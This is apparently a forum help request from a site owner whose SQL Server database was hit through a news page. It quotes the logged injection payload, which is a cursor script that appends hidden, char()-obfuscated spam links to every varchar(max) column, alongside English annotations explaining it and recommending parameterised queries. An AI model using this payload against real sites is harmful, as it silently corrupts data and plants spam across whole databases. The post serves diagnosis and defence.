数据库遭攻击,求救!!
网站采用.NET三层架构,SQL操作都采用了防止SQL注入攻击的措施。这两天发现数据库中某个表的字段莫名出现一连串HTML代码,查询服务器应用程序日志发现如下警告。这是我们的一个新闻展示页,对方是如何用这种方式攻击的?我该怎么做,才能阻止他攻击?
http://www.xxxxxxxx.com/Manage/WebManage/OrderNewDetail.aspx?ContentID=532;
-- Logged request text, kept as evidence; this is not application code.
-- Everything from here down follows "ContentID=532;" on the request line above, i.e. it
-- arrived inside the ContentID query-string value after a statement separator.
-- NOTE(review): columns were modified, which suggests OrderNewDetail.aspx builds its SQL
-- by concatenating ContentID, so the extra statements ran in the same batch. Confirm this
-- in the page's data-access code.
-- Defender notes: reject any ContentID that is not an integer and pass it as a bound
-- parameter; run the site under a database login that can only read the news tables,
-- so it cannot UPDATE arbitrary tables.
declare @c cursor;
declare @d varchar(4000);
-- The cursor's result set is one generated UPDATE statement per matching column.
set @c=cursor for select
-- The string literal below (ending at "end'") is the UPDATE template. It appends a hidden
-- <div> containing a spam link to the column's existing value. char(60), char(62) and
-- char(47) are '<', '>' and '/', so those characters never appear literally in the
-- injected markup; log or WAF searches should match "char(60)" as well as "<div".
-- The outer CASE on ABS(CHECKSUM(NewId()))%7 appends the markup only when the random
-- value is 0 and an empty string otherwise, so only part of the data is altered
-- (presumably evaluated per row; confirm against an affected table).
'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']
=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''''+char(60)+
''div style="display:none"''+char(62)+''abortion clinics in ny ''+char(60)+
''a href="http:''+char(47)+char(47)+''astrobix.com''+char(47)+''astroblog''+
char(47)+''page''+char(47)+''how-to-end-pregnancy.aspx"''+char(62)+case ABS(CHECKSUM(NewId()))%3 when 0 then ''
pregnancy nine weeks'' when 1 then ''abortion pills over the counter'' else ''are abortions painful'' END
+char(60)+char(47)+''a''+char(62)+'' carly fiorina abortion''+char(60)+char(47)+''div''+char(62)+'''' else '''' end'
-- Target selection: sysindexes rows with indid 0 or 1 (in SQL Server, the heap or
-- clustered-index row, one per table) joined through sysobjects to
-- INFORMATION_SCHEMA.COLUMNS. It keeps columns whose DATA_TYPE ends in "varchar" and whose
-- CHARACTER_MAXIMUM_LENGTH is -1 (what SQL Server reports for the (max) types) or 2147483647.
-- NOTE(review): the "SELECT TOP 1 * FROM sysindexes" line sits between FROM and the first
-- INNER JOIN and does not parse there; it looks like a paste or logging artifact. Compare
-- it with the raw log entry.
FROM sysindexes AS i
SELECT TOP 1 * FROM sysindexes
INNER JOIN sysobjects AS o ON i.id=o.id
INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME
WHERE(indid=0 or indid=1) and DATA_TYPE
like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
-- Runs each generated UPDATE through dynamic SQL. Cleanup therefore has to cover every
-- column matched by the filter above, not only the field where the HTML was first noticed.
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0
begin exec (@d);
fetch next from @c into @d;
end;
-- The capture stops here with no DEALLOCATE visible; the logged text may be truncated.
close @c